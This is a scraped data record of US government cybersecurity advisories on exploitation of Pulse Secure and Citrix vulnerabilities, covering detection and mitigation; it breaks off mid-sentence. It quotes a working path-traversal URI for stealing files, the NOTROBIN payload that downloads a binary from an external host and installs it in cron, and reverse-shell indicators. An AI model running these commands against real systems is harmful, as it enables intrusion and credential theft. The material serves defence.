\n\n![](/sites/default/files/publications/TTPs_Figure2.PNG)\n\n_Figure 2: MITRE ATT&CK Enterprise tactics and techniques used by Chinese state-sponsored cyber actors ([Click here for the downloadable JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>).) _\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.\n\nTo request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>).\n\nFor NSA client requirements or general cybersecurity inquiries, contact the NSA Cybersecurity Requirements Center at 410-854-4200 or [Cybersecurity_Requests@nsa.gov.](<mailto:Cybersecurity_Requests@nsa.gov>)\n\nMedia Inquiries / Press Desk: \n\u2022 NSA Media Relations, 443-634-0721, [MediaRelations@nsa.gov](<mailto:MediaRelations@nsa.gov>) \n\u2022 CISA Media Relations, 703-235-2010, [CISAMedia@cisa.dhs.gov](<mailto:CISAMedia@cisa.dhs.gov>) \n\u2022 FBI National Press Office, 202-324-3691, [npo@fbi.gov](<mailto:npo@fbi.gov>)\n\n### References\n\n[[1] FireEye: This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>)\n\n### Revisions\n\nJuly 19, 2021: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-20T12:00:00", "type": "ics", "title": "Chinese State-Sponsored Cyber Operations: Observed TTPs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2021-08-20T12:00:00", "id": "AA21-200B", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-200b", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-23T07:43:42", "description": "### Summary\n\n_**Note: ** This Activity Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/> \"Enterprise Matrix\" ) framework for all referenced threat actor techniques and mitigations._\n\nThis Alert provides an update to Cybersecurity and Infrastructure Security Agency (CISA) [Alert AA20-010A: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-010a> \"Continued Exploitation of Pulse Secure VPN Vulnerability\" ), which advised organizations to immediately patch CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure virtual private network (VPN) appliances.[[1]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101> \"Pulse Secure Community\" ) CISA is providing this update to alert administrators that threat actors who successfully exploited CVE-2019-11510 and stole a victim organization\u2019s credentials will still be able to access\u2014and move laterally through\u2014that organization\u2019s network after the organization has patched this vulnerability if the organization did not change those stolen credentials.\n\nThis Alert provides new detection methods for this activity, including a [CISA-developed tool](<https://github.com/cisagov/check-your-pulse> \"cisagov / check-your-pulse\" ) that helps network administrators search for indicators of compromise (IOCs) associated with exploitation of CVE-2019-11510. This Alert also provides mitigations for victim organizations to recover from attacks resulting from CVE-2019-11510. CISA encourages network administrators to remain aware of the ramifications of exploitation of CVE-2019-11510 and to apply the detection measures and mitigations provided in this report to secure networks against these attacks.\n\nFor a downloadable copy of IOCs, see STIX file.\n\n#### **Background**\n\nCISA has conducted multiple incident response engagements at U.S. Government and commercial entities where malicious cyber threat actors have exploited CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure VPN appliances\u2014to gain access to victim networks. Although Pulse Secure released patches for CVE-2019-11510 in April 2019,[[2]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101> \"Pulse Secure Community\" ) CISA has observed incidents where compromised Active Directory credentials were used months after the victim organization patched their VPN appliance.\n\n### Technical Details\n\nCISA determined that cyber threat actors have been able to obtain plaintext Active Directory credentials after gaining _Initial Access_ [[TA0001]](<https://attack.mitre.org/versions/v7/tactics/TA0001/> \"Initial Access\" ) to a victim organization\u2019s network via VPN appliances. Cyber threat actors used these _Valid Accounts_ [[T1078]](<https://attack.mitre.org/versions/v7/techniques/T1078/> \"Valid Accounts\" ) in conjunction with:\n\n * _External Remote Services_ [[T1133]](<https://attack.mitre.org/versions/v7/techniques/T1133> \"External Remote Services\" ) for access,\n * _Remote Services_ [[T1021]](<https://attack.mitre.org/versions/v7/techniques/T1021> \"Remote Services\" ) for _Lateral Movement _[[TA0008]](<https://attack.mitre.org/versions/v7/tactics/TA0008/> \"Lateral Movement\" ) to move quickly throughout victim network environments, and\n * _Data Encrypted for Impact_ [[T1486 ]](<https://attack.mitre.org/versions/v7/techniques/T1486> \"Data Encrypted for Impact\" ) for impact, as well as\n * _Exfiltration _[[TA0010]](<https://attack.mitre.org/versions/v7/tactics/TA0010/> \"Exfiltration\" ) and sale of the data.\n\n### Initial Access\n\nCVE-2019-11510 is a pre-authentication arbitrary file read vulnerability affecting Pulse Secure VPN appliances. A remote attacker can exploit this vulnerability to request arbitrary files from a VPN server. The vulnerability occurs because directory traversal is hard coded to be allowed if the path contains `dana/html5acc/`.[[3]](<https://twitter.com/XMPPwocky/status/1164874297690611713/photo/1> \"Twitter\" ),[[4]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848> \"184 Pulse Secure SSL VPN\" ) For example, a malicious cyber actor can obtain the contents of `/etc/passwd` [[5]](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh> \"BishopFox / pwn-pulse\" ) by requesting the following uniform resource identifier (URI):\n\n`https://vulnvpn.example[.]com/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/`\n\nObtaining the contents of `/etc/passwd` gives the attacker access to basic information about local system accounts. This request was seen in the proof of concept (POC) code for this exploit on [Github](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh> \"BishopFox / pwn-pulse\" ). An attacker can also leverage the vulnerability to access other files that are useful for remote exploitation. By requesting the data.mdb object, an attacker can leak plaintext credentials of enterprise users.[[6]](<https://www.exploit-db.com/exploits/47297> \"Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure \$Metasploit\$\" ),[[7]](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11> \"Twitter\" ),[[8]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848> \"184 Pulse Secure SSL VPN Vulnerability Being Exploited in the Wild\" )\n\nOpen-source reporting indicates that cyber threat actors can exploit CVE-2019-11510 to retrieve encrypted passwords;[[9]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?tab=comments#comment-887> \"184 Pulse Secure SSL VPN Vulnerability Being Exploited in the Wild\" ) however, CISA has not observed this behavior. By reviewing victim VPN appliance logs, CISA has noted cyber threat actors crafting requests that request files that allow for _Credential Dumping_ [[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003> \"OS Credential Dumping\" ) plaintext passwords from the VPN appliance.\n\n### Test Environment\n\nTo confirm the open-source reporting and validate what the cyber threat actors had access to, CISA used a test environment to send crafted requests. CISA used requests found both in proof-of-concept, open-source code and in requests from the logs of compromised victims. By doing so, CISA confirmed that plaintext Active Directory credentials were leaked and that it was possible to leak the local admin password to the VPN appliance. (See figure 1.)\n\n![](/sites/default/files/publications/AA20-107A-figure_1.png)\n\n##### Figure 1: Exploitation of the VPN appliance leading to plaintext local admin credentials\n\nCISA\u2019s test environment consisted of a domain controller (DC) running Windows Server 2016, an attacker machine, and a Pulse Secure VPN appliance version 9.0R3 (build 64003). CISA connected the attacker machine to the external interface of the Pulse Secure VPN appliance and the DC to the internal interface.\n\nCISA created three accounts for the purpose of validating the ability to compromise them by exploiting CVE-2019-11510.\n\n * Local Pulse Secure Admin account \n * Username: `admin`; Password: `pulse-local-password`\n * Domain Administrator Account \n * Username: `Administrator`; Password: `domain-admin-password1`\n * CISA-test-user Account \n * Username: `cisa-test-user`; Password: `Use_s3cure_passwords`\n\nAfter creating the accounts, CISA joined the VPN appliance to the test environment domain, making a point not to cache the domain administrator password. (See figure 2.)\n\n![](/sites/default/files/publications/AA20-107A-figure_2.png)\n\n##### Figure 2: VPN appliance joined to the domain without caching the domain administrator password\n\nCISA used a similar file inclusion to test the ability to _Credential Dump _[[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003> \"OS Credential Dumping\" ) the domain administrator password. CISA determined it was possible to leak the domain administrator password that was used to join the device to the domain without saving the credentials. Refer to figure 3 for the URI string tested by CISA.\n\n![](/sites/default/files/publications/AA20-107A-figure_3.png)\n\n##### Figure 3: Exploitation of the VPN appliance leading to cleartext domain admin credentials\n\nNext, CISA validated the ability to _Credential Dump _[[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003> \"OS Credential Dumping\" ) a user password from the VPN appliance. To do this, CISA created a _user realm _(Pulse Secure configuration terminology) and configured its roles/resource groups to allow for Remote Desktop Protocol (RDP) over HTML5 (Apache Guacamole). After using the new user to remotely access an internal workstation over RDP, CISA used a crafted request (see figure 4) to leak the credentials from the device. (**Note:** the path to stored credentials is publicly available.)[[10]](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11>)\n\n![](/sites/default/files/publications/AA20-107A-figure_4.png)\n\n##### Figure 4: Exploitation of the VPN appliance leading to plaintext user credentials\n\nThis test confirmed CISA\u2019s suspicion that threat actors had access to each of the various compromised environments.\n\n### Cyber Threat Actor Behavior in Victim Network Environments\n\nCISA observed\u2014once credentials were compromised\u2014cyber threat actors accessing victim network environments via the Pulse Secure VPN appliances. Cyber threat actors used _Connection Proxies _[[T1090]](<https://attack.mitre.org/versions/v7/techniques/T1090> \"Proxy\" )\u2014such as Tor infrastructure and virtual private servers (VPSs)\u2014to minimize the chance of detection when they connected to victim VPN appliances.\n\nUsing traditional host-based analysis, CISA identified the following malicious cyber actor actions occurring in a victim\u2019s environment:\n\n * Creating persistence via scheduled tasks/remote access trojans\n * Amassing files for exfiltration\n * Executing ransomware on the victim\u2019s network environment\n\nBy correlating these actions with the connection times and user accounts recorded in the victim\u2019s Pulse Secure `.access` logs, CISA was able to identify unauthorized threat actor connections to the victim\u2019s network environment. CISA was then able to use these Internet Protocol (IP) addresses and user-agents to identify unauthorized connections to the network environments of other victims. Refer to the Indicators of Compromise section for the IP addresses CISA observed making these unauthorized connections.\n\nIn one case, CISA observed a cyber threat actor attempting to sell the stolen credentials after 30 unsuccessful attempts to connect to the customer environment to escalate privileges and drop ransomware. CISA has also observed this threat actor successfully dropping ransomware at hospitals and U.S. Government entities.\n\nIn other cases, CISA observed threat actors leveraging tools, such as LogMeIn and TeamViewer, for persistence. These tools would enable threat actors to maintain access to the victim\u2019s network environment if they lost their primary connection.\n\n### Initial Detection\n\nConventional antivirus and endpoint detection and response solutions did not detect this type of activity because the threat actors used legitimate credentials and remote services. \n\nAn intrusion detection system may have noticed the exploitation of CVE-2019-11510 if the sensor had visibility to the external interface of the VPN appliance (possible in a customer\u2019s demilitarized zone) and if appropriate rules were in place. Heuristics in centralized logging may have been able to detect logins from suspicious or foreign IPs, if configured.\n\n### Post-Compromise Detection and IOC Detection Tool\n\nGiven that organizations that have applied patches for CVE-2019-11510 may still be at risk for exploitation from compromises that occurred pre-patch, CISA developed detection methods for organizations to determine if their patched VPN appliances have been targeted by the activity revealed in this report.\n\nTo detect past exploitation of CVE-2019-11510, network administrators should:\n\n 1. Turn on unauthenticated log requests (see figure 5). (**Note:** there is a risk of overwriting logs with unauthenticated requests so, if enabling this feature, be sure to frequently back up logs; if possible, use a remote syslog server.) \n\n![](/sites/default/files/publications/AA20-107A-figure_5.png)\n\n##### Figure 5: Checkbox that enables logging exploit attacks\n\n 2. Check logs for exploit attempts. To detect lateral movement, system administrators should look in the logs for strings such as` ../../../data `(see figure 6). \n\n![](/sites/default/files/publications/AA20-107A-figure_6.png)\n\n##### Figure 6: Strings for detection of lateral movement\n\n 3. Manually review logs for unauthorized sessions and exploit attempts, especially sessions originating from unexpected geo-locations.\n 4. Run CISA\u2019s IOC detection tool. CISA developed a tool that enables administrators to triage logs (if authenticated request logging is turned on) and automatically search for IOCs associated with exploitation of CVE-2019-11510. CISA encourages administrators to visit [CISA\u2019s GitHub page](<https://github.com/cisagov/check-your-pulse> \"cisagov / check-your-pulse\" ) to download and run the tool. While not exhaustive, this tool may find evidence of attempted compromise.\n\n### Indicators of Compromise\n\nCISA observed IP addresses making unauthorized connections to customer infrastructure. (**Note:** these IPs were observed as recently as February 15, 2020.) The IP addresses seen making unauthorized connections to customer infrastructure were different than IP addresses observed during initial exploitation. Please see the STIX file below for IPs.\n\nCISA observed the following user agents with this activity:\n\n * Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0\n * Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0\n * Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55[.]0.2883.87 Safari/537.36\n\nCISA also observed:\n\n * A cyber threat actor renaming portable executable (PE) files in an attempt to subvert application allow listing or antivirus (AV) protections. See table 1 for hashes of files used.\n * A threat actor \u201cliving off the land\u201d and utilizing C:\\Python\\ArcGIS to house malicious PE files, as well as using natively installed Python.\n * A threat actor attack infrastructure: 38.68.36(dot)112 port 9090 and 8088\n\n##### Table 1: Filenames and hashes of files used by a threat actor\n\nFilename | MD5 \n---|--- \nt.py (tied to scheduled task, python meterpreter reverse shell port 9090) | 5669b1fa6bd8082ffe306aa6e597d7f5 \ng.py (tied to scheduled task, python meterpreter reverse shell port 8088) | 61eebf58e892038db22a4d7c2ee65579 \n \nFor a downloadable copy of IOCs, see STIX file.\n\n### Mitigations\n\nCISA strongly urges organizations that have not yet done so to upgrade their Pulse Secure VPN to the corresponding patches for CVE-2019-11510. If\u2014after applying the detection measures in this alert\u2014organizations detect evidence of CVE-2019-11510 exploitation, CISA recommends changing passwords for all Active Directory accounts, including administrators and services accounts.\n\nCISA also recommends organizations to:\n\n * Look for unauthorized applications and scheduled tasks in their environment.\n * Remove any remote access programs not approved by the organization.\n * Remove any remote access trojans.\n * Carefully inspect scheduled tasks for scripts or executables that may allow an attacker to connect to an environment.\n\nIf organizations find evidence of malicious, suspicious, or anomalous activity or files, they should consider reimaging the workstation or server and redeploying back into the environment. CISA recommends performing checks to ensure the infection is gone even if the workstation or host has been reimaged.\n\n### Contact Information\n\nTo report suspicious activity related to information found in this joint Cybersecurity Advisory, contact CISA\u2019s 24/7 Operations Center at report@cisa.gov or (888) 282-0870. When available, please include the information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.\n\n**References**\n\n[[1] Pulse Secure Advisory SA44101 ](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101> \"Pulse Secure Community\" )\n\n[[2] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101> \"Pulse Secure Community\" )\n\n[[3] Twitter. @XMPPwocky. (2019, August 23). Your least favorite construct ](<https://twitter.com/XMPPwocky/status/1164874297690611713/photo/1> \"XMPPwocky\" )\n\n[[4] OpenSecurity Forums. Public vulnerability discussion. (2019, August 23). ](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848> \"OpenSecurity Forums\" )\n\n[[5] GitHub. BishopFox / pwn-pulse. ](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh> \"BishopFox / pwn-pulse\" )\n\n[[6] File disclosure in Pulse Secure SSL VPN (Metasploit) ](<https://www.exploit-db.com/exploits/47297> \"Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure \$Metasploit\$\" )\n\n[[7] Twitter. @alyssa_herra ](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11> \"Twitter\" )\n\n[[8] OpenSecurity Forums. Public vulnerability discussion. (2019, August 23). ](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848> \"OpenSecurity Forums\" )\n\n[[9] OpenSecurity Forums. Public vulnerability discussion. (2019, August 31). ](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?tab=comments#comment-887> \"OpenSecurity Forums\" )\n\n[[10] Twitter. @alyssa_herra](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11> \"Twitter\" )\n\n### Revisions\n\nApril 16, 2020: Initial Version\n\nOctober 23, 2020: Revision\n\nSeptember 05, 2023: Revision\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Continued Threat Actor Exploitation Post Pulse Secure VPN Patching", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-10-24T12:00:00", "id": "AA20-107A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-107a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T07:47:17", "description": "### Summary\n\nUnknown cyber network exploitation (CNE) actors have successfully compromised numerous organizations that employed vulnerable Citrix devices through a critical vulnerability known as CVE-2019-19781.[[1]](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\nThough mitigations were released on the same day Citrix announced CVE-2019-19781, organizations that did not appropriately apply the mitigations were likely to be targeted once exploit code began circulating on the internet a few weeks later.\n\nCompromised systems cannot be remediated by applying software patches that were released to fix the vulnerability. Once CNE actors establish a foothold on an affected device, their presence remains even though the original attack vector has been closed.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Alert to provide tools and technologies to assist with detecting the presence of these CNE actors. Unpatched systems and systems compromised before the updates were applied remain susceptible to exploitation.\n\nContact [CISA](<https://www.us-cert.gov/report>), or the [FBI](<https://www.fbi.gov/contact-us/field-offices/field-offices>) to report an intrusion or to request assistance.\n\n### Technical Details\n\n## Detection\n\nCISA has developed the following procedures for detecting a CVE-2019-19781 compromise. \n\n#### HTTP Access and Error Log Review\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nThe impacted Citrix products utilize Apache for web server software, and as a result, HTTP access and error logs should be available on the system for review in `/var/log`. Log files `httpaccess.log` and `httperror.log` should both be reviewed for the following Uniform Resource Identifiers (URIs), found in the proof of concept exploit that was released.\n\n * `'*/../vpns/*'`\n * `'*/vpns/cfg/smb.conf'`\n * `'*/vpns/portal/scripts/newbm.pl*'`\n * `'*/vpns/portal/scripts/rmbm.pl*'`\n * `'*/vpns/portal/scripts/picktheme.pl*'`\n\nNote: These URIs were observed in Security Information and Event Management detection content provided by <https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>.[[2]](<https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml>)\n\nPer TrustedSec, a sign of successful exploitation would be a `POST` request to a URI containing `/../` or `/vpn`, followed by a GET request to an XML file. If any exploitation activity exists\u2014attempted or successful\u2014analysts should be able to identify the attacking Internet Protocol address(es). Tyler Hudak\u2019s blog provided sample logs indicating what a successful attack would look like.[[3]](<https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/>)\n\n`10.1.1.1 - - [10/Jan/2020:13:23:51 +0000] \"POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1\" 200 143 \"https://10.1.1.2/\" \"USERAGENT \"`\n\n`10.1.1.1 - - [10/Jan/2020:13:23:53 +0000] \"GET /vpn/../vpns/portal/backdoor.xml HTTP/1.1\" 200 941 \"-\" \"USERAGENT\"`\n\nAdditionally, FireEye provided the following `grep` commands to assist with log review and help to identify suspicious activity.[[4]](<https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html>)\n\n`grep -iE 'POST.*\\.pl HTTP/1\\.1\\\" 200 ' /var/log/httpaccess.log -A 1`\n\n`grep -iE 'GET.*\\.xml HTTP/1\\.1\\\" 200' /var/log/httpaccess.log -B 1`\n\n#### Running Processes Review\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nReviewing the running processes on a system suspected of compromise for processes running under the `nobody `user can identify potential backdoors.\n\n`ps auxd | grep nobody`\n\nAnalysts should review the `ps` output for suspicious entries such as this:\n\n`nobody 63390 0.0 0.0 8320 16 ?? I 1:35PM 0:00.00 | | `\u2013 sh -c uname & curl -o \u2013 http://10.1.1.2/backdoor`\n\nFurther pivoting can be completed using the Process ID from the PS output:\n\n`lsof -p <pid>`\n\nDue to the nature of this exploit, it is likely that any processes related to a backdoor would be running under the `httpd` process.\n\n### Checking for NOTROBIN Presence\n\n**Context: **Host Hunt\n\n**Type:** Methodology\n\n`pkill -9 netscalerd; rm /var/tmp/netscalerd; mkdir /tmp/.init; curl -k`\n\n`hxxps://95.179.163[.]186/wp-content/uploads/2018/09/64d4c2d3ee56af4f4ca8171556d50faa -o`\n\n`/tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo \"* * * * *`\n\n`/var/nstmp/.nscache/httpd\" | crontab -; /tmp/.init/httpd &\"`\n\nThe above is the NOTROBIN Bash exploit code. To check for NOTROBIN Presence, analysts should look for the staging directory at `/tmp/.init` as well as `httpd` processes running as a cron job.\n\nRunning the command `find / -name \".init\" 2> /tmp/error.log` should return the path to the created staging directory while taking all of the errors and creating a file located at `/tmp/error.log`.\n\n### Additional /var/log Review\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nAnalysts should focus on reviewing the following logs in `/var/log` on the Citrix device, if available. The underlying operating system is based on FreeBSD, and the logs are similar to what would be found on a Linux system. Analysts should focus on log entries related to the `nobody` user or `(null) on` and should try to identify any suspicious commands that may have been run, such as `whoami` or `curl`. Please keep in mind that logs are rotated and compressed, and additional activity may be found in the archives (.gz files) for each log.\n\n**bash.log**\n\nSample Log Entry:\n\n`Jan 10 13:35:47`\n\n`<local7.notice> ns bash[63394]: nobody on /dev/pts/3`\n\n`shell_command=\"hostname\"`\n\nNote: The bash log can provide the user (`nobody`), command (`hostname`), and process id (`63394`) related to the nefarious activity.\n\n**sh.log**\n\n**notice.log**\n\n### Check Crontab for Persistence\n\n**Context:** Host Hunt\n\n**Type: **Methodology\n\nAs with running processes and log entries, any cron jobs created by the user `nobody` are a cause for concern and likely related to a persistence mechanism established by an attacker. Additionally, search for a `httpd` process within the crontab to determine if a system has been affected by NOTROBIN. Analysts can review entries on a live system using the following command:\n\n`crontab -l -u nobody`\n\n### Existence of Unusual Files\n\n**Context:** Host Hunt\n\n**Type:** Methodology\n\nOpen-source outlets have reported that during incident response activities, attackers exploiting this vulnerability have been placing malicious files in the following directories. Analysts should review file listings for these directories and determine if any suspicious files are present on the server.\n\n * `/netscaler/portal/templates`\n * `/var/tmp/netscaler/portal/templates`\n\n### Snort Alerts\n\n**Context: **Network Alert\n\n**Type: **Signatures\n\nAlthough most activity related to exploitation of the Citrix vulnerability would use SSL, FireEye noted that an HTTP scanner is available to check for the vulnerability. The following Snort rules were provided in FireEye\u2019s blog post and would likely indicate a vulnerable Citrix server.[5] These rules should be tuned for the environment and restricted to the IP addresses of the Citrix server(s) to reduce potential false positives.\n\n`alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:\"Potential CVE-2019-19781 vulnerable .CONF response\"; flow:established,to_client; content:\"HTTP/1.\"; depth:7; content:\"200 OK\"; distance:1; content:\"|0d0a|Server: Apache\"; distance:0; content:\"al]|0d0a|\"; distance:0; content:\"encrypt passwords\"; distance:0; content:\"name resolve order\"; reference:cve,2019-19781; reference:url,https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html; sid:201919781; rev:1;)`\n\n`alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:\"Potential CVE-2019-19781 vulnerable .PL response\"; flow:established,to_client; content:\"HTTP/1.\"; depth:7;`\n\n`content:\"200 OK\"; distance:1; content:\"|0d0a|Server: Apache\"; distance:0; `\n\n`content:\"|0d0a|Connection: Keep-Alive\"; `\n\n`content:\"|0d0a0d0a3c48544d4c3e0a3c424f44593e0a3c534352495054206c616e67756167653d6`\n\n`a61766173637269707420747970653d746578742f6a6176617363726970743e0a2f2f706172656e74`\n\n`2e77696e646f772e6e735f72656c6f616428293b0a77696e646f772e636c6f736528293b0a3c2f534`\n\n`3524950543e0a3c2f424f44593e0a3c2f48544d4c3e0a|\"; reference:cve,2019-19781; reference:url,https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html; sid:201919781; rev:1;)`\n\n### Suspicious Network Traffic\n\n**Context:** Network Hunt\n\n**Type: **Methodology\n\nFrom a network perspective, this vulnerability will likely not be detectable, given that the traffic will likely be encrypted (SSL). Additionally, due to where they sit on networks, devices such as these are typically not covered in traditional network monitoring and ingress traffic to the device may not be part of a normal SPAN port configuration. In the event network monitoring is available and attackers are using HTTP versions of this exploit, CISA recommends looking for URIs containing `/../` or `/vpns/` to identify potentially malicious activity. It is also worth surveying the traffic for any requests to .xml files or perl (.pl) files as well, as this would not be consistent with normal Citrix web activity. As with the web logs, analysts would be looking for a successful `POST` request followed by a successful `GET` request with the aforementioned characteristics.\n\nGiven that a compromise occurred, activity to look for would be outbound traffic from the Citrix server, both to internal and external hosts. In theory, if an attacker placed a backdoor on the system, it should be connecting outbound to a command and control server. This traffic would most likely be anomalous (outbound TCP Port 80 or 443), given that one would only expect to see inbound TCP/443 traffic to the Citrix server as normal activity. If an attacker is leveraging a Citrix device as an entry point to an organization, anomalous internal traffic could potentially be visible in bro data such as scanning, file transfers, or lateral movement. An exception to internal traffic is that the Citrix ADC device is much more than just an SSL VPN device and is used for multiple types of load balancing. As a result, an ADC device may be communicating with internal systems legitimately (web servers, file servers, custom applications, etc.).\n\n**Inbound Exploitation Activity (Suspicious URIs)**\n\n`index=bro dest=<CITRIX_IP_ADDR> sourcetype=bro_http uri=*/../* OR uri=*/vpn* OR uri=*.pl OR uri=*.xml`\n\n**Outbound Traffic Search (Backdoor C2)**\n\n`index=bro sourcetype=bro_conn src=<CITRIX_IP_ADDR> dest!=<INTERNAL_NET>`\n\n`| stats count by src dest dest_port`\n\n`| sort -count`\n\nThe following resources provide additional detection measures.\n\n * Citrix and FireEye Mandiant released an IOC scanning tool for CVE-2019-19781.[[6]](<https://github.com/citrix/ioc-scanner-CVE-2019-19781/>) The tool aids customers with detecting potential IOCs based on known attacks and exploits.\n * The National Security Agency released a Cybersecurity Advisory on CVE-2019-19781 with additional detection measures.[[7]](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n * CISA released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781.[[8]](<https://github.com/cisagov/check-cve-2019-19781>)\n\n## Impact\n\nCVE-2019-19781 is an arbitrary code execution vulnerability that has been detected in exploits in the wild. An attacker can exploit this vulnerability to take control of an affected 